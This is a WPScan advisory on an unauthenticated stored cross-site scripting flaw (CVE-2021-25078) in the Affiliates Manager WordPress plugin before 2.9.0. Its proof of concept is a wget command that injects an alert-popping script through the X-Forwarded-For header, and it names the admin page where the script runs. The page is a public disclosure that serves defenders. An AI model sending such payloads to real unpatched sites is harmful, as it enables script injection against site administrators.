WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Affiliates Manager < 2.9.0 - Unauthenticated Stored Cross-Site Scripting

Description

The plugin does not validate, sanitise and escape the IP address of requests logged by the click tracking feature, allowing unauthenticated attackers to perform Cross-Site Scripting attacks against admin viewing the tracked requests.

Proof of Concept

As unauthenticated: wget "https://example.com/?wpam_id=1" --header="X-Forwarded-For: <img src onerror=alert(/XSS/)>" -q -O-

The XSS will be triggered when an admin access http://example.com/wp-admin/admin.php?page=wpam-clicktracking

Affects Plugins

affiliates-manager
Fixed in version 2.9.0

References

CVE
CVE-2021-25078
URL
https://plugins.trac.wordpress.org/changeset/2648196

Classification

Type

XSS

OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79

Miscellaneous

Original Researcher

Krzysztof Zając

Submitter

Krzysztof Zając

Submitter website
https://kazet.cc/
Verified

Yes

WPVDB ID
d4edb5f2-aa1b-4e2d-abb4-76c46def6c6e

Timeline

Publicly Published

2021-12-24 (about 4 months ago)

Added

2021-12-24 (about 4 months ago)

Last Updated

2022-04-10 (about 1 months ago)

Our Other Services

WPScan WordPress Security Plugin